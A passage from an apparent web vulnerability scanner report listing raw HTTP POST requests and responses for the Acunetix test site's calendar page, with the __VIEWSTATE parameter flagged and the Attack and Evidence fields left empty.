Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8307&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAZY2todoIZGRkOHSckbgOxL4%2BiYOLqvGkGz2os6w%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQhvG%2BDgLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJg5ib26%2FpYgTwewuhVEtIqZa1w0g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:34 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAZY2todoIZGRkOHSckbgOxL4+iYOLqvGkGz2os6w=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQhvG+DgLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJg5ib26/pYgTwewuhVEtIqZa1w0g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:White" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8306&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDA%2B2LkoNoIZGRkZIaOw12aCAwmptJ8Co0HQaGMDbY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKO84e9AQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIth0kiqzVGtQtvIimpe0mljUPekQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:34 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDA+2LkoNoIZGRkZIaOw12aCAwmptJ8Co0HQaGMDbY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKO84e9AQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIth0kiqzVGtQtvIimpe0mljUPekQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:White" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
